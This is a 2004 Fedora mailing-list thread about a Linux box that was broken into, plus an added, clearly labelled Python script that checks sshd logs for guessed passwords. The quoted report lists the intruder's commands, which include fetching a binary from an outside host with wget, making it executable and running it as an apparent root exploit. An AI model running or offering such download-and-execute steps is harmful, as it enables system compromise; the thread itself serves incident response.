Vulnerability on FC3T2 ? Present in FC3 ?

Aaron Scott scott.aaron at abc.net.au
Mon Nov 22 04:51:52 UTC 2004


And how does this prove that there is a vulnerability in Fedora and not
that you have poor security?

According to the URLs you post, someone has installed a root kit.
Unlucky.  But they had to get it there first.

You should first discover how they got onto your machine.  You will need
to check a lot more logs than just wtmp.  Try secure and messages as
well.  Maybe someone guessed your password.  I really hope that you
have firewalled that IP range out to help prevent further trouble from
that IP range (assuming though the hacker isn't bouncing from
compromised machine to compromised machine).  Also, you might want to
consider who has had or might have had physical access to your machine
(if that is possible).

Pointing the finger at Fedora without real proof is pointless.


On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:

> Someone logged into my system on 13 Nov 2004
> I found the following in /var/log/wtmp
> 
> 207-36-180-20.prt.primarydns.com
> demo.allegientsystems.com
> 
> My user password was changed - but not the root password - and the 
> following commands had been executed:-
> 
> w
> uname -a
> cat /etc/issue
> cd /tmp
> wget chebeleu.com/local
> chmod +x local
> ./local -d -r
> ./local -d -r
> lunx
> lynx
> 
> There is a similar report dated 10-Nov-2004 at 
> http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> where someone suggested it might be the exploit at 
> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
> 
> Anybody know any more ?
> 
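
The log check suggested in the reply above, as an added example that is not part of either poster's message: it scans sshd entries in the /var/log/secure format for a successful password login preceded by repeated failures from the same address, which is the trace a guessed password leaves. The sample lines, addresses, user names and the `guessed_logins` helper are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the sshd format found in /var/log/secure (not from the post).
SAMPLE_SECURE = """\
Nov 13 03:11:58 host sshd[2101]: Failed password for illegal user admin from 192.0.2.10 port 4240 ssh2
Nov 13 03:12:01 host sshd[2103]: Failed password for user1 from 192.0.2.10 port 4242 ssh2
Nov 13 03:12:04 host sshd[2105]: Failed password for user1 from 192.0.2.10 port 4244 ssh2
Nov 13 03:12:09 host sshd[2107]: Accepted password for user1 from 192.0.2.10 port 4250 ssh2
Nov 13 09:30:12 host sshd[2299]: Accepted password for alice from 198.51.100.7 port 5011 ssh2
Nov 13 10:02:40 host sshd[2310]: Failed password for alice from 198.51.100.7 port 5040 ssh2
"""

# Matches sshd password events; older sshd logs "illegal user", newer "invalid user".
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for "
    r"(?:(?:invalid|illegal) user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def guessed_logins(log_text, min_failures=3):
    """Return accepted logins preceded by >= min_failures failures from the same IP."""
    failures = defaultdict(int)   # source IP -> failures since its last accepted login
    hits = []
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue              # not an sshd password event
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip] += 1
            continue
        if failures[ip] >= min_failures:
            hits.append({"time": m["ts"], "user": m["user"], "ip": ip,
                         "failures_before": failures[ip]})
        failures[ip] = 0          # an accepted login resets the count for that IP
    return hits

if __name__ == "__main__":
    for hit in guessed_logins(SAMPLE_SECURE):
        print(hit)
```

On a real host the same function can be fed the contents of /var/log/secure and its rotated copies; the failure count is per source address, so guesses spread across many addresses need a per-user count instead.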